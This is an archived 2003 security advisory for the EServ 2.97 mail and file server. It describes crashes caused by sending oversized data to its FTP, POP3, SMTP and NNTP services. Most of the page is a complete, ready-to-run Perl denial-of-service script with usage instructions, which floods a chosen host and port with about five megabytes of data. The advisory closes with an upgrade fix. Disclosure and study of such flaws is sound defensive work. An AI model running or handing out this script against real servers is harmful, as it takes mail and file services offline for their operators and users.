TUCoPS :: Windows Apps :: win5907.htm

EServ DoS
5th Jan 2003 [SBWID-5907]
COMMAND

	EServ DoS

SYSTEMS AFFECTED

	EServ 2.97, may be 2.98

PROBLEM

	In D4rkGr3y of Damage Hacking  Group  security  [http://www.dhgroup.org]
	advisory :
	
	We founded 4 bugs, that allows to kill EServ  by  sending  data  with  a
	very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b,  NNTP
	- 5001216b. This is not buffer overflow, so it's impossible to use  this
	bugs for privelege escalation or something like this.
	
	 #Exploit#
	
	#!/usr/bin/perl
	######################################################
	#EServ/2.97 remote DoS xsploit
	#Bugs founded in v.2.97 but I think that 2.98 is
	#vulnerable too.
	#################
	#Usage: perl EServ.DoS.pl [host] [port] [service_type]
	#Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
	#Example: perl EServ.DoS.pl localhost 110 pop
	#################
	#If something wrong or u wanna to discuss something,
	#contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
	#######################################################
	use IO::Socket;
	$host = $ARGV[0];
	$port = $ARGV[1];
	$param = $ARGV[2];
	$data = "a";
	print "\n\n";;
	print "#Product: EServ/2.97 - www.eserv.ru\n";
	print "#Vuln: remote DoS\n";
	print "#Xsploit by D4rkGr3y\n";
	print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
	if ($param) {
	$num = "4950001" if $param eq "pop";
	$num = "4960000" if $param eq "smtp";
	$num = "5005312" if $param eq "ftp";
	$num = "5001215" if $param eq "nntp";
	die "Error in params\n" if !$num;
	print "Connecting...";
	$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket
	error.\n";
	print "OK\n";
	$buf .= $data x $num;
	print "Attacking...";
	print $socket "$buf\n";
	print "OK\n\n";
	print "Vizit us at www.dhgroup.org";
	close($socket);
	} else {
	  print "Error in Params.\n";
	  print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
	  print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
	  print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
	  exit;
	}
	
	#EOF
	
	

SOLUTION

	Get version 2.99 from [http://www.eserv.ru]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH